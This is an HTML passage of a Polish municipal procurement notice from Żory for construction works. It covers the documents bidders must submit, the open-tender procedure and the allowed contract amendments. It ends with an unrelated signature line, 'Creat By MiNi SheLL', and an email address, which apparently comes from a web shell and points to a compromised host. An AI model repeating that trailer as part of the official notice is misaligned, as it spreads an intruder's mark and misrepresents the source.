<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych  podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Przyczyna/okoliczności    
Zmiana przepisów o podatku od towarów i usług
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT
II. Przyczyna/okoliczności    
Przekształcenie firmy, zmiana nazwy firmy
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy
III. Przyczyna/okoliczności 
Długotrwałe, tj. powyżej 5 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy przedłużającego termin realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót oraz jeśli zajdzie potrzeba zmiana warunków płatności (przesunięcie faktur przewidzianych do płatności w 2014 roku na rok 2015)
IV. Przyczyna/okoliczności   
Znalezienie niewybuchów
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy przesuwającego termin wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów oraz jeśli zajdzie potrzeba zmiana warunków płatności (przesunięcie faktur przewidzianych do płatności w 2014 roku na rok 2015)
V. Przyczyna/okoliczności                                         
Wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót oraz jeśli zajdzie potrzeba zmiana warunków płatności (przesunięcie faktur przewidzianych do płatności w 2014 roku na rok 2015)
VI. Przyczyna/okoliczności                                         
Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę z przyczyn niezależnych od Wykonawcy.
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę.
VII. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b
Skutek - zmiana w umowie/aneks
Wprowadzenie (Podwykonawca lub Wykonawca) innego podmiotu który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2014 godzina 12:00, miejsce: Urząd Miasta Żory, Al. Wojska Polskiego 25, 44-240 Żory, pok. INFORMACJA - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com